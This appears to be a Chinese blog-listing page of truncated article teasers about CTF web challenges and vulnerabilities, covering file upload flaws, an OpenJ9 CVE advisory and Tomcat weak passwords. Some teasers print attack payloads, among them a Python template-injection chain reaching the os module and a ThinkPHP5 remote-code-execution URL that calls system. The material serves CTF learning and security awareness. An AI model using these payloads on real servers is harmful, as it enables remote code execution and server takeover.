1.判断存在python模块注入 {{7+7}} 2.{{''.__class__.__mro__[2].__subclasses__()}} 3.{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].li ...
分类:
编程语言 时间:
2020-03-12 18:47:17
阅读次数:
479
1.查看robots.txt页面 2.查看fl0g.php页面 ...
分类:
Web程序 时间:
2020-03-12 14:42:42
阅读次数:
74
1.thinkphp5 rce漏洞,构造payload, ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%27 ...
分类:
Web程序 时间:
2020-03-12 14:18:31
阅读次数:
97
File Upload(文件上传) File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 ...
分类:
Web程序 时间:
2020-03-11 23:45:29
阅读次数:
89
安华金和攻防实验室2018年提交给IBM的OpenJ9漏洞于近日完成修复,IBM推出补丁。由于这个漏洞(CVE-2018-12547)影响IBM产品多达400+、攻击复杂度低、危害大,CVE漏洞危害评分高达9.8。安华金和特此向广大用户告警,提醒OpenJ9用户及时下载IBM官网最新公布的补丁。 O ...
分类:
其他好文 时间:
2020-03-10 10:22:59
阅读次数:
122
豹子安全-注入工具-asp_POST_DNS_SQLServer_GetWebShell 注意,是 DNS 注入。这种方式的注入会隐藏很多细节, 对于用户来说是透明的。 注意,先要查看 《Flash 被禁止运行的方法》, 然后再Flash的中间会出现“允许Flash允许”(鼠标要拖至右侧的滑块条至中 ...
分类:
数据库 时间:
2020-03-08 14:16:58
阅读次数:
122
题目: 打开网页之后,首先看到登录框,就想到弱密码和注入,先burp抓包发送尝试: 发现提示:你可能需要一个字典,应该就是弱密码,随手一个12345/123456成功了,要是尝试几个不成功的话,可能就得去跑字典了 ...
分类:
其他好文 时间:
2020-03-07 13:15:26
阅读次数:
67
题目: <?php show_source(__FILE__); include("config.php"); //文件包含函数 $a=@$_GET['a']; //获取参数a $b=@$_GET['b']; //获取参数b if($a==0 and $a){ //第一个判定条件 使构造条件成立 e ...
分类:
Web程序 时间:
2020-03-07 12:55:23
阅读次数:
196
题目 解题过程 扫了下端口和目录,没发现啥有用的信息。。。看了下提示,需要用到php源文件phps(咱之前没听说过) 访问:http://111.198.29.45:49502/index.phps,出现源码: <?php if("admin" $_GET[id]) { echo("<p>not a ...
分类:
Web程序 时间:
2020-03-06 17:54:22
阅读次数:
148
更新时间: 2017-10-17 Tomcat服务默认启用了管理后台功能,使用该后台可直接上传 war 文件包对站点进行部署和管理。由于运维人员的疏忽,可能导致管理后台存在空口令或者弱口令的漏洞,使得黑客或者不法分子可以利用该漏洞直接上传 Webshell 脚本导致服务器沦陷。 通常 Tomcat ...
分类:
其他好文 时间:
2020-03-03 13:18:38
阅读次数:
83
